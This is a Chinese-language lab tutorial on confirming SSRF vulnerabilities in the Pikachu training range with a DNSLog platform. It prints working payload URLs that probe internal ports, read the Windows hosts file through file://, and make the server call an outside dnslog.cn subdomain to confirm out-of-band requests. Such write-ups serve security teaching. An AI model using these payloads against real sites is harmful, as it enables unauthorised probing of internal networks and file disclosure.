DNSLog漏洞探测(六)之SSRF漏洞实战
本文我们来学习如何利用DNSLog平台探测目标网站是否存在SSRF漏洞,接下来我们还是利用Pikachu的靶场作为演示。首先我们先进入Pikachu靶场的SSRF漏洞界面。SSRF漏洞更多的可以称之为服务端的请求伪造。
像是原本探测漏洞的手段,我们只需要在URL中提交以下的payload就可以探测到该漏洞
#探测端口
http://localhost/pikachu/vul/ssrf/ssrf_curl.php?url=dict://127.0.0.1:80
#访问文件
http://localhost/pikachu/vul/ssrf/ssrf_curl.php?url=file://c:\windows\system32\drivers\etc\hosts
如图我们提交payload之后,网站返回给了我们一个响应,显示80端口开放
但是如果该处没有回显,那么就该利用DNSLog平台来解决无回显的问题了,首先我们打开DNSLog服务平台,点击 Get SubDomain 获取一个子域名,这里我们获取到的子域名是 72uj0g.dnslog.cn
接下来我们只需要提交以下的payload,将其中的XXXXX部分替换为我们从DNSLog服务平台获取到的子域名就好了
#原始的payload
http://localhost/pikachu/vul/ssrf/ssrf_fgc.php?url=http://xxxxx.dnslog.cn
#本文利用的payload
http://localhost/pikachu/vul/ssrf/ssrf_fgc.php?url=http://72uj0g.dnslog.cn
提交完payload以后的界面回显
现在我们回到DNSLog服务平台,点击 Refresh Record刷新,然后DNSLog服务平台便会返回给我们DNSLog解析记录,这下我们就通过DNSLog平台验证了该处存在SSRF漏洞
同样的我们来到第二个SSRF漏洞关卡
接下来我们构造如下的payload提交,将其中的XXXXX部分替换为我们从DNSLog服务平台获取到的子域名就好了,通过file协议去触发我们的payload
#原始的payload
http://localhost/pikachu/vul/ssrf/ssrf_fgc.php?file=http://XXXXX.dnslog.cn
#本文利用的payload
http://localhost/pikachu/vul/ssrf/ssrf_fgc.php?file=http://72uj0g.dnslog.cn
按下回车键之后
现在我们回到DNSLog服务平台,再次点击 Refresh Record刷新,然后DNSLog服务平台便新增了一条DNSLog服务解析记录